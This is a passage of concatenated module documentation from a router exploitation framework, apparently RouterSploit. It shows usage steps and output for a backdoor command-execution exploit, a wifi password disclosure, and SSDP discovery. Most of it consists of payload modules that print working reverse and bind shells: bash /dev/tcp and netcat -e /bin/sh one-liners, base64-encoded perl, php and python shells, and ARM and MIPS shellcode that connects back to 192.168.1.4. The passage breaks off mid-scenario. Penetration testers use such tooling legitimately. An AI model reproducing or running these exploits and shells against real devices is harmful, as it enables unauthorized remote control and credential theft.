[+] Target is vulnerable [*] Connection established Parameter Value --------- ----- http_username admin http_password admin pppoe_username username pppoe_password 1234567890 pppoa_username Guest log_login 0 ``` ================================================ FILE: docs/modules/exploits/routers/multi/tcp_32764_rce.md ================================================ ## Description Module exploits backdoor functionality that allows executing commands on operating system level. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use exploits/routers/multi/tcp_32764_rce` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If the device is vulnerable, it is possible to execute commands on operating system level. ## Scenarios ``` rsf > use exploits/routers/multi/tcp_32764_rce rsf (TCP-32764 RCE) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (TCP-32764 RCE) > run [*] Running module... [+] Target is vulnerable [*] Invoking command loop... [+] Welcome to cmd. Commands are sent to the target via the execute method. [*] For further exploitation use 'show payloads' and 'set payload ' commands. cmd > echo test [*] Executing 'echo test' on the device... [*] Connection established test cmd > ``` ================================================ FILE: docs/modules/exploits/routers/zte/zxhn_h108n_wifi_password_disclosure.md ================================================ ## Description Module exploits a wifi password disclosure vulnerability that allows retrieving the password for the wifi connection. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use exploits/routers/zte/zxhn_h108n_wifi_password_disclosure` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If the device is vulnerable, the SSID and wifi password are retrieved. 
## Scenarios ``` rsf > use exploits/routers/zte/zxhn_h108n_wifi_password_disclosure rsf (ZTE ZXHN H108N Wifi Password Disclosure) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (ZTE ZXHN H108N Wifi Password Disclosure) > run [*] Running module exploits/routers/zte/zxhn_h108n_wifi_password_disclosure... [+] Target is vulnerable [*] Discovered information: Parameter Value --------- ----- SSID Name SSID Name Password Password ``` ================================================ FILE: docs/modules/generic/upnp/ssdp_msearch.md ================================================ ## Description Module sends an M-SEARCH request to the target and retrieves information from UPnP-enabled systems. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use generic/upnp/ssdp_msearch` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If the target supports UPnP, information is retrieved. ## Scenarios ``` rsf > use generic/upnp/ssdp_msearch rsf (SSDP M-SEARCH Info Discovery) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (SSDP M-SEARCH Info Discovery) > run [*] Running module... [*] 192.168.1.1:1900 | Custom/1.0 UPnP/1.0 Proc/Ver | http://192.168.1.1:5431/dyndev/uuid:ec2280e5-e804-04e8-e580-22ec22e50400 | uuid:ec2280e5-e804-04e8-e580-22ec22e50400::upnp:rootdevice ``` ================================================ FILE: docs/modules/payloads/armle/bind_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp bind shell for ARMLE architecture. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/armle/bind_tcp` 3. Do: `set rport 4321` 4. Do: `run` 5. Module generates armle bind shell tcp payload ## Scenarios ``` rsf > use payloads/armle/bind_tcp rsf (ARMLE Bind TCP) > set rport 4321 [+] rport => 4321 rsf (ARMLE Bind TCP) > run [*] Running module... 
[*] Generating payload [+] Building payload for python payload = ( "\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x06\x20\xa0\xe3\x07\x00\x2d" "\xe9\x01\x00\xa0\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x0c\xd0" "\x8d\xe2\x00\x60\xa0\xe1\xe1\x10\xa0\xe3\x10\x70\xa0\xe3\x01" "\x1c\xa0\xe1\x07\x18\x81\xe0\x02\x10\x81\xe2\x02\x20\x42\xe0" "\x06\x00\x2d\xe9\x0d\x10\xa0\xe1\x10\x20\xa0\xe3\x07\x00\x2d" "\xe9\x02\x00\xa0\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x14\xd0" "\x8d\xe2\x06\x00\xa0\xe1\x03\x00\x2d\xe9\x04\x00\xa0\xe3\x0d" "\x10\xa0\xe1\x66\x00\x90\xef\x08\xd0\x8d\xe2\x06\x00\xa0\xe1" "\x01\x10\x41\xe0\x02\x20\x42\xe0\x07\x00\x2d\xe9\x05\x00\xa0" "\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x0c\xd0\x8d\xe2\x00\x60" "\xa0\xe1\x02\x10\xa0\xe3\x06\x00\xa0\xe1\x3f\x00\x90\xef\x01" "\x10\x51\xe2\xfb\xff\xff\x5a\x04\x10\x4d\xe2\x02\x20\x42\xe0" "\x2f\x30\xa0\xe3\x62\x70\xa0\xe3\x07\x34\x83\xe0\x69\x70\xa0" "\xe3\x07\x38\x83\xe0\x6e\x70\xa0\xe3\x07\x3c\x83\xe0\x2f\x40" "\xa0\xe3\x73\x70\xa0\xe3\x07\x44\x84\xe0\x68\x70\xa0\xe3\x07" "\x48\x84\xe0\x73\x50\xa0\xe3\x68\x70\xa0\xe3\x07\x54\x85\xe0" "\x3e\x00\x2d\xe9\x08\x00\x8d\xe2\x00\x10\x8d\xe2\x04\x20\x8d" "\xe2\x0b\x00\x90\xef" ) ``` ================================================ FILE: docs/modules/payloads/armle/reverse_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp reverse shell for ARMLE architecture. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/armle/reverse_tcp` 3. Do: `set lhost 192.168.1.4` 4. Do: `set lport 4321` 5. Module generates armle reverse shell tcp payload ## Scenarios ``` rsf > rsf > use payloads/armle/reverse_tcp rsf (ARMLE Reverse TCP) > set lhost 192.168.1.4 [+] lhost => 192.168.1.4 rsf (ARMLE Reverse TCP) > set lport 4321 [+] lport => 4321 rsf (ARMLE Reverse TCP) > run [*] Running module... 
[*] Generating payload [+] Building payload for python payload = ( "\x01\x10\x8f\xe2\x11\xff\x2f\xe1\x02\x20\x01\x21\x92\x1a\x0f" "\x02\x19\x37\x01\xdf\x06\x1c\x08\xa1\x10\x22\x02\x37\x01\xdf" "\x3f\x27\x02\x21\x30\x1c\x01\xdf\x01\x39\xfb\xd5\x05\xa0\x92" "\x1a\x05\xb4\x69\x46\x0b\x27\x01\xdf\xc0\x46\x02\x00\x10\xe1" "\xc0\xa8\x01\x04\x2f\x62\x69\x6e\x2f\x73\x68\x00" ) ``` ================================================ FILE: docs/modules/payloads/cmd/awk_bind_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp bind shell by using awk one-liner. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/cmd/awk_bind_tcp` 3. Do: `set rport 4321` 4. Do: `run` 5. Module generates awk tcp bind shell payload. ## Scenarios ``` rsf > use payloads/cmd/awk_bind_tcp rsf (Awk Bind TCP) > set rport 4321 [+] rport => 4321 rsf (Awk Bind TCP) > run [*] Running module... [*] Generating payload awk 'BEGIN{s="/inet/tcp/4321/0/0";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}' ``` ================================================ FILE: docs/modules/payloads/cmd/awk_bind_udp.md ================================================ ## Description Module generates payload that creates interactive udp bind shell by using awk. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/cmd/awk_bind_tcp` 3. Do: `set rport 4321` 4. Do: `run` 5. Module generates awk udp bind shell payload ## Scenarios ``` rsf > use payloads/cmd/awk_bind_udp rsf (Awk Bind UDP) > set rport 4321 [+] rport => 4321 rsf (Awk Bind UDP) > run [*] Running module... 
[*] Generating payload awk 'BEGIN{s="/inet/udp/4321/0/0";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}' ``` ================================================ FILE: docs/modules/payloads/cmd/awk_reverse_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp reverse shell by using awk one-liner. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/cmd/awk_reverse_tcp` 3. Do: `set lhost 192.168.1.3` 4. Do: `set lport 4321` 5. Do: `run` 6. Module generates awk tcp reverse shell payload ## Scenarios ``` rsf > use payloads/cmd/awk_reverse_tcp rsf (Awk Reverse TCP) > set lhost 192.168.1.4 [+] lhost => 192.168.1.4 rsf (Awk Reverse TCP) > set lport 4321 [+] lport => 4321 rsf (Awk Reverse TCP) > run [*] Running module... [*] Generating payload awk 'BEGIN{s="/inet/tcp/0/192.168.1.4/4321";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)};' ``` ================================================ FILE: docs/modules/payloads/cmd/bash_reverse_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp reverse shell by using bash one-liner. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/cmd/bash_reverse_tcp` 3. Do: `set lhost 192.168.1.4` 4. Do: `set lport 4321` 5. Do: `run` 6. Module generates bash tcp reverse shell payload ## Scenarios ``` rsf > use payloads/cmd/bash_reverse_tcp rsf (Bash Reverse TCP) > set lhost 192.168.1.4 [+] lhost => 192.168.1.4 rsf (Bash Reverse TCP) > set lport 4321 [+] lport => 4321 rsf (Bash Reverse TCP) > run [*] Running module... [*] Generating payload bash -i >& /dev/tcp/192.168.1.4/4321 0>&1 ``` ================================================ FILE: docs/modules/payloads/cmd/netcat_bind_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp bind shell by using netcat one-liner. 
## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/cmd/netcat_bind_tcp` 3. Do: `set rport 4321` 4. Do: `run` 5. Module generates netcat tcp bind shell payload. ## Scenarios ``` rsf > use payloads/cmd/netcat_bind_tcp rsf (Netcat Bind TCP) > set rport 4321 [+] rport => 4321 rsf (Netcat Bind TCP) > run [*] Running module... [*] Generating payload nc -lvp 4321 -e /bin/sh ``` ================================================ FILE: docs/modules/payloads/cmd/netcat_reverse_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp reverse shell by using netcat one-liner. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/cmd/netcat_reverse_tcp` 3. Do: `set lhost 192.168.1.4` 4. Do: `set lport 4321` 5. Do: `run` 6. Module generates netcat tcp reverse shell payload ## Scenarios ``` rsf > use payloads/cmd/netcat_reverse_tcp rsf (Netcat Reverse TCP) > set lhost 192.168.1.4 [+] lhost => 192.168.1.4 rsf (Netcat Reverse TCP) > set lport 4321 [+] lport => 4321 rsf (Netcat Reverse TCP) > run [*] Running module... [*] Generating payload nc 192.168.1.4 4321 -e /bin/sh ``` ================================================ FILE: docs/modules/payloads/cmd/perl_bind_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp bind shell by using perl one-liner. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/cmd/perl_bind_udp` 3. Do: `set rport 4321` 4. Do: `run` 5. Module generates perl tcp bind shell payload. ## Scenarios ``` rsf > use payloads/cmd/perl_bind_tcp rsf (Perl Bind TCP One-Liner) > set rport 4321 [+] rport => 4321 rsf (Perl Bind TCP One-Liner) > run [*] Running module... 
[*] Generating payload perl -MIO -e "use MIME::Base64;eval(decode_base64('dXNlIElPO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKExvY2FsUG9ydCw0MzIxLFJldXNlLDEsTGlzdGVuKS0+YWNjZXB0OyR+LT5mZG9wZW4oJGMsdyk7U1RESU4tPmZkb3BlbigkYyxyKTt3aGlsZSg8Pil7aWYoJF89fiAvKC4qKS8pe3N5c3RlbSAkMTt9fTs='));" ``` ================================================ FILE: docs/modules/payloads/cmd/perl_reverse_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp reverse shell by using perl one-liner. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/cmd/perl_reverse_tcp` 3. Do: `set lhost 192.168.1.3` 4. Do: `set lport 4321` 5. Do: `run` 6. Module generates perl tcp reverse shell payload ## Scenarios ``` rsf > use payloads/cmd/perl_reverse_tcp rsf (Perl Reverse TCP One-Liner) > set lhost 192.168.1.3 [+] lhost => 192.168.1.3 rsf (Perl Reverse TCP One-Liner) > set lport 4321 [+] lport => 4321 rsf (Perl Reverse TCP One-Liner) > run [*] Running module... [*] Generating payload perl -MIO -e "use MIME::Base64;eval(decode_base64('dXNlIElPO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCIxOTIuMTY4LjEuMzo0MzIxIik7U1RESU4tPmZkb3BlbigkYyxyKTskfi0+ZmRvcGVuKCRjLHcpO3doaWxlKDw+KXtpZigkXz1+IC8oLiopLyl7c3lzdGVtICQxO319Ow=='));" ``` ================================================ FILE: docs/modules/payloads/cmd/php_bind_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp bind shell by using php one-liner. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/cmd/php_bind_tcp` 3. Do: `set rport 4321` 4. Do: `run` 5. 
Module generates php tcp bind shell payload ## Scenarios ``` rsf > use payloads/cmd/php_bind_tcp rsf (PHP Bind TCP One-Liner) > set rport 4321 [+] rport => 4321 rsf (PHP Bind TCP One-Liner) > run [*] Running module... [*] Generating payload php -r "eval(base64_decode('JHM9c29ja2V0X2NyZWF0ZShBRl9JTkVULFNPQ0tfU1RSRUFNLFNPTF9UQ1ApO3NvY2tldF9iaW5kKCRzLCIwLjAuMC4wIiw0MzIxKTtzb2NrZXRfbGlzdGVuKCRzLDEpOyRjbD1zb2NrZXRfYWNjZXB0KCRzKTt3aGlsZSgxKXtpZighc29ja2V0X3dyaXRlKCRjbCwiJCAiLDIpKWV4aXQ7JGluPXNvY2tldF9yZWFkKCRjbCwxMDApOyRjbWQ9cG9wZW4oIiRpbiIsInIiKTt3aGlsZSghZmVvZigkY21kKSl7JG09ZmdldGMoJGNtZCk7c29ja2V0X3dyaXRlKCRjbCwkbSxzdHJsZW4oJG0pKTt9fQ=='));" ``` ================================================ FILE: docs/modules/payloads/cmd/php_reverse_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp reverse shell by using php one-liner. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/cmd/php_reverse_tcp` 3. Do: `set lhost 192.168.1.4` 4. Do: `set lport 4321` 5. Do: `run` 6. Module generates php tcp reverse shell payload ## Scenarios ``` rsf > use payloads/cmd/php_reverse_tcp rsf (PHP Reverse TCP One-Liner) > set lhost 192.168.1.4 [+] lhost => 192.168.1.4 rsf (PHP Reverse TCP One-Liner) > set lport 4321 [+] lport => 4321 rsf (PHP Reverse TCP One-Liner) > run [*] Running module... [*] Generating payload php -r "eval(base64_decode('JHM9ZnNvY2tvcGVuKCJ0Y3A6Ly8xOTIuMTY4LjEuNCIsNDMyMSk7d2hpbGUoIWZlb2YoJHMpKXtleGVjKGZnZXRzKCRzKSwkbyk7JG89aW1wbG9kZSgiXG4iLCRvKTskby49IlxuIjtmcHV0cygkcywkbyk7fQ=='));" ``` ================================================ FILE: docs/modules/payloads/cmd/python_bind_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp bind shell by using python one-liner. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/cmd/python_bind_tcp` 3. Do: `set rport 4321` 4. Do: `run` 5. 
Module generates python tcp bind shell payload ## Scenarios ``` rsf > use payloads/cmd/python_bind_tcp rsf (Python Reverse TCP One-Liner) > set rport 4321 [+] rport => 4321 rsf (Python Reverse TCP One-Liner) > run [*] Running module... [*] Generating payload python -c "exec('aW1wb3J0IHNvY2tldCxvcwpzbz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkKc28uYmluZCgoJzAuMC4wLjAnLDQzMjEpKQpzby5saXN0ZW4oMSkKc28sYWRkcj1zby5hY2NlcHQoKQp4PUZhbHNlCndoaWxlIG5vdCB4OgoJZGF0YT1zby5yZWN2KDEwMjQpCglzdGRpbixzdGRvdXQsc3RkZXJyLD1vcy5wb3BlbjMoZGF0YSkKCXN0ZG91dF92YWx1ZT1zdGRvdXQucmVhZCgpK3N0ZGVyci5yZWFkKCkKCXNvLnNlbmQoc3Rkb3V0X3ZhbHVlKQo='.decode('base64'))" ``` ================================================ FILE: docs/modules/payloads/cmd/python_bind_udp.md ================================================ ## Description Module generates payload that creates interactive udp bind shell by using python one-liner. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/cmd/python_bind_udp` 3. Do: `set rport 4321` 4. Do: `run` 5. Module generates python udp bind shell payload ## Scenarios ``` rsf > use payloads/cmd/python_bind_udp rsf (Python Bind UDP One-Liner) > set rport 4321 [+] rport => 4321 rsf (Python Bind UDP One-Liner) > run [*] Running module... [*] Generating payload python -c "exec('ZnJvbSBzdWJwcm9jZXNzIGltcG9ydCBQb3BlbixQSVBFCmZyb20gc29ja2V0IGltcG9ydCBzb2NrZXQsIEFGX0lORVQsIFNPQ0tfREdSQU0Kcz1zb2NrZXQoQUZfSU5FVCxTT0NLX0RHUkFNKQpzLmJpbmQoKCcwLjAuMC4wJyw0MzIxKSkKd2hpbGUgMToKCWRhdGEsYWRkcj1zLnJlY3Zmcm9tKDEwMjQpCglvdXQ9UG9wZW4oZGF0YSxzaGVsbD1UcnVlLHN0ZG91dD1QSVBFLHN0ZGVycj1QSVBFKS5jb21tdW5pY2F0ZSgpCglzLnNlbmR0bygnJy5qb2luKFtvdXRbMF0sb3V0WzFdXSksYWRkcikK'.decode('base64'))" ``` ================================================ FILE: docs/modules/payloads/cmd/python_reverse_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp reverse shell by using python one-liner. ## Verification Steps 1. 
Start `./rsf.py` 2. Do: `use payloads/cmd/python_reverse_tcp` 3. Do: `set lhost 192.168.1.4` 4. Do: `set lport 4321` 5. Do: `run` 6. Module generates python udp reverse shell payload ## Scenarios ``` rsf > use payloads/cmd/python_reverse_tcp rsf (Python Reverse TCP One-Liner) > set lhost 192.168.1.4 [+] lhost => 192.168.1.4 rsf (Python Reverse TCP One-Liner) > set lport 4321 [+] lport => 4321 rsf (Python Reverse TCP One-Liner) > run [*] Running module... [*] Generating payload python -c "exec('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zCnM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pCnMuY29ubmVjdCgoJzE5Mi4xNjguMS40Jyw0MzIxKSkKb3MuZHVwMihzLmZpbGVubygpLDApCm9zLmR1cDIocy5maWxlbm8oKSwxKQpvcy5kdXAyKHMuZmlsZW5vKCksMikKcD1zdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwiLWkiXSk='.decode('base64'))" ``` ================================================ FILE: docs/modules/payloads/cmd/python_reverse_udp.md ================================================ ## Description Module generates payload that creates interactive udp reverse shell by using python one-liner. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/cmd/python_reverse_udp` 3. Do: `set lhost 192.168.1.4` 4. Do: `set lport 4321` 5. Do: `run` 6. Module generates python udp reverse shell payload ## Scenarios ``` rsf > use payloads/cmd/python_reverse_udp rsf (Python Reverse UDP One-Liner) > set lhost 192.168.1.4 [+] lhost => 192.168.1.4 rsf (Python Reverse UDP One-Liner) > set lport 4321 [+] lport => 4321 rsf (Python Reverse UDP One-Liner) > run [*] Running module... 
[*] Generating payload python -c "exec('aW1wb3J0IG9zCmltcG9ydCBwdHkKaW1wb3J0IHNvY2tldApzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsIHNvY2tldC5TT0NLX0RHUkFNKQpzLmNvbm5lY3QoKCcxOTIuMTY4LjEuNCcsNDMyMSkpCm9zLmR1cDIocy5maWxlbm8oKSwgMCkKb3MuZHVwMihzLmZpbGVubygpLCAxKQpvcy5kdXAyKHMuZmlsZW5vKCksIDIpCnB0eS5zcGF3bignL2Jpbi9zaCcpOwpzLmNsb3NlKCkK'.decode('base64'))" ``` ================================================ FILE: docs/modules/payloads/mipsbe/bind_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp bind shell for MIPSBE architecture. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/mipsbe/bind_tcp` 3. Do: `set rport 4321` 4. Do: `run` 5. Module generates mipsbe bind shell tcp payload ## Scenarios ``` rsf > use payloads/mipsbe/bind_tcp rsf (MIPSBE Bind TCP) > set rport 4321 [+] rport => 4321 rsf (MIPSBE Bind TCP) > run [*] Running module... [*] Generating payload [+] Building payload for python payload = ( "\x27\xbd\xff\xe0\x24\x0e\xff\xfd\x01\xc0\x20\x27\x01\xc0\x28" "\x27\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c\x30\x50" "\xff\xff\x24\x0e\xff\xef\x01\xc0\x70\x27\x24\x0d\xff\xfd\x01" "\xa0\x68\x27\x01\xcd\x68\x04\x24\x0e\x10\xe1\x01\xae\x68\x25" "\xaf\xad\xff\xe0\xaf\xa0\xff\xe4\xaf\xa0\xff\xe8\xaf\xa0\xff" "\xec\x02\x10\x20\x25\x24\x0e\xff\xef\x01\xc0\x30\x27\x23\xa5" "\xff\xe0\x24\x02\x10\x49\x01\x01\x01\x0c\x02\x10\x20\x25\x24" "\x05\x01\x01\x24\x02\x10\x4e\x01\x01\x01\x0c\x02\x10\x20\x25" "\x28\x05\xff\xff\x28\x06\xff\xff\x24\x02\x10\x48\x01\x01\x01" "\x0c\xaf\xa2\xff\xff\x24\x11\xff\xfd\x02\x20\x88\x27\x8f\xa4" "\xff\xff\x02\x20\x28\x21\x24\x02\x0f\xdf\x01\x01\x01\x0c\x24" "\x10\xff\xff\x22\x31\xff\xff\x16\x30\xff\xfa\x28\x06\xff\xff" "\x3c\x0f\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xec\x3c\x0e\x6e" "\x2f\x35\xce\x73\x68\xaf\xae\xff\xf0\xaf\xa0\xff\xf4\x27\xa4" "\xff\xec\xaf\xa4\xff\xf8\xaf\xa0\xff\xfc\x27\xa5\xff\xf8\x24" "\x02\x0f\xab\x01\x01\x01\x0c" ) ``` 
================================================ FILE: docs/modules/payloads/mipsbe/reverse_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp reverse shell for MIPSBE architecture. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/mipsbe/reverse_tcp` 3. Do: `set lhost 192.168.1.4` 4. Do: `set lport 4321` 5. Module generates mipsbe reverse shell tcp payload ## Scenarios ``` rsf > use payloads/mipsbe/reverse_tcp rsf (MIPSBE Reverse TCP) > set lhost 192.168.1.4 [+] lhost => 192.168.1.4 rsf (MIPSBE Reverse TCP) > set lport 4321 [+] lport => 4321 rsf (MIPSBE Reverse TCP) > run [*] Running module... [*] Generating payload [+] Building payload for python payload = ( "\x28\x04\xff\xff\x24\x02\x0f\xa6\x01\x09\x09\x0c\x28\x04\x11" "\x11\x24\x02\x0f\xa6\x01\x09\x09\x0c\x24\x0c\xff\xfd\x01\x80" "\x20\x27\x24\x02\x0f\xa6\x01\x09\x09\x0c\x24\x0c\xff\xfd\x01" "\x80\x20\x27\x01\x80\x28\x27\x28\x06\xff\xff\x24\x02\x10\x57" "\x01\x09\x09\x0c\x30\x44\xff\xff\x24\x02\x0f\xc9\x01\x09\x09" "\x0c\x24\x02\x0f\xc9\x01\x09\x09\x0c\x3c\x05\x00\x02\x34\xa5" "\x10\xe1\xaf\xa5\xff\xf8\x3c\x05\xc0\xa8\x34\xa5\x01\x04\xaf" "\xa5\xff\xfc\x23\xa5\xff\xf8\x24\x0c\xff\xef\x01\x80\x30\x27" "\x24\x02\x10\x4a\x01\x09\x09\x0c\x3c\x08\x2f\x2f\x35\x08\x62" "\x69\xaf\xa8\xff\xec\x3c\x08\x6e\x2f\x35\x08\x73\x68\xaf\xa8" "\xff\xf0\x28\x07\xff\xff\xaf\xa7\xff\xf4\xaf\xa7\xff\xfc\x23" "\xa4\xff\xec\x23\xa8\xff\xec\xaf\xa8\xff\xf8\x23\xa5\xff\xf8" "\x27\xbd\xff\xec\x28\x06\xff\xff\x24\x02\x0f\xab\x00\x90\x93" "\x4c" ) ``` ================================================ FILE: docs/modules/payloads/mipsle/bind_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp bind shell for MIPSLE architecture. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/mipsle/bind_tcp` 3. Do: `set rport 4321` 4. Do: `run` 5. 
Module generates mipsle bind shell tcp payload ## Scenarios ``` rsf > use payloads/mipsle/bind_tcp rsf (MIPSLE Bind TCP) > set rport 4321 [+] rport => 4321 rsf (MIPSLE Bind TCP) > run [*] Running module... [*] Generating payload [+] Building payload for python payload = ( "\xe0\xff\xbd\x27\xfd\xff\x0e\x24\x27\x20\xc0\x01\x27\x28\xc0" "\x01\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x01\x01\x01\xff\xff" "\x50\x30\xef\xff\x0e\x24\x27\x70\xc0\x01\x10\xe1\x0d\x24\x04" "\x68\xcd\x01\xfd\xff\x0e\x24\x27\x70\xc0\x01\x25\x68\xae\x01" "\xe0\xff\xad\xaf\xe4\xff\xa0\xaf\xe8\xff\xa0\xaf\xec\xff\xa0" "\xaf\x25\x20\x10\x02\xef\xff\x0e\x24\x27\x30\xc0\x01\xe0\xff" "\xa5\x23\x49\x10\x02\x24\x0c\x01\x01\x01\x25\x20\x10\x02\x01" "\x01\x05\x24\x4e\x10\x02\x24\x0c\x01\x01\x01\x25\x20\x10\x02" "\xff\xff\x05\x28\xff\xff\x06\x28\x48\x10\x02\x24\x0c\x01\x01" "\x01\xff\xff\xa2\xaf\xfd\xff\x11\x24\x27\x88\x20\x02\xff\xff" "\xa4\x8f\x21\x28\x20\x02\xdf\x0f\x02\x24\x0c\x01\x01\x01\xff" "\xff\x10\x24\xff\xff\x31\x22\xfa\xff\x30\x16\xff\xff\x06\x28" "\x62\x69\x0f\x3c\x2f\x2f\xef\x35\xec\xff\xaf\xaf\x73\x68\x0e" "\x3c\x6e\x2f\xce\x35\xf0\xff\xae\xaf\xf4\xff\xa0\xaf\xec\xff" "\xa4\x27\xf8\xff\xa4\xaf\xfc\xff\xa0\xaf\xf8\xff\xa5\x27\xab" "\x0f\x02\x24\x0c\x01\x01\x01" ) ``` ================================================ FILE: docs/modules/payloads/mipsle/reverse_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp reverse shell for MIPSLE architecture. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/mipsle/reverse_tcp` 3. Do: `set lhost 192.168.1.4` 4. Do: `set lport 4321` 5. Module generates mipsle reverse shell tcp payload ## Scenarios ``` rsf > use payloads/mipsle/reverse_tcp rsf (MIPSLE Reverse TCP) > set lhost 192.168.1.4 [+] lhost => 192.168.1.4 rsf (MIPSLE Reverse TCP) > set lport 4321 [+] lport => 4321 rsf (MIPSLE Reverse TCP) > run [*] Running module... 
[*] Generating payload [+] Building payload for python payload = ( "\xff\xff\x04\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\x11\x11\x04" "\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20" "\x80\x01\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27" "\x20\x80\x01\x27\x28\x80\x01\xff\xff\x06\x28\x57\x10\x02\x24" "\x0c\x09\x09\x01\xff\xff\x44\x30\xc9\x0f\x02\x24\x0c\x09\x09" "\x01\xc9\x0f\x02\x24\x0c\x09\x09\x01\x10\xe1\x05\x3c\x02\x00" "\xa5\x34\xf8\xff\xa5\xaf\x01\x04\x05\x3c\xc0\xa8\xa5\x34\xfc" "\xff\xa5\xaf\xf8\xff\xa5\x23\xef\xff\x0c\x24\x27\x30\x80\x01" "\x4a\x10\x02\x24\x0c\x09\x09\x01\x62\x69\x08\x3c\x2f\x2f\x08" "\x35\xec\xff\xa8\xaf\x73\x68\x08\x3c\x6e\x2f\x08\x35\xf0\xff" "\xa8\xaf\xff\xff\x07\x28\xf4\xff\xa7\xaf\xfc\xff\xa7\xaf\xec" "\xff\xa4\x23\xec\xff\xa8\x23\xf8\xff\xa8\xaf\xf8\xff\xa5\x23" "\xec\xff\xbd\x27\xff\xff\x06\x28\xab\x0f\x02\x24\x0c\x09\x09" "\x01" ) ``` ================================================ FILE: docs/modules/payloads/perl/bind_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp bind shell by using perl. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/perl/bind_tcp` 3. Do: `set rport 4321` 4. Do: `run` 5. Module generates perl tcp bind shell payload ## Scenarios ``` rsf > use payloads/perl/bind_tcp rsf (Perl Bind TCP) > set rport 4321 [+] rport => 4321 rsf (Perl Bind TCP) > run [*] Running module... 
[*] Generating payload use MIME::Base64;eval(decode_base64('dXNlIElPO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKExvY2FsUG9ydCw0MzIxLFJldXNlLDEsTGlzdGVuKS0+YWNjZXB0OyR+LT5mZG9wZW4oJGMsdyk7U1RESU4tPmZkb3BlbigkYyxyKTt3aGlsZSg8Pil7aWYoJF89fiAvKC4qKS8pe3N5c3RlbSAkMTt9fTs=')); ``` ================================================ FILE: docs/modules/payloads/perl/reverse_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp reverse shell by using perl. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/perl/reverse_tcp` 3. Do: `set lhost 192.168.1.3` 3. Do: `set lport 4321` 4. Do: `run` 5. Module generates perl tcp reverse shell payload ## Scenarios ``` rsf > use payloads/perl/reverse_tcp rsf (Perl Reverse TCP) > set lhost 192.168.1.3 [+] lhost => 192.168.1.3 rsf (Perl Reverse TCP) > set lport 4321 [+] lport => 4321 rsf 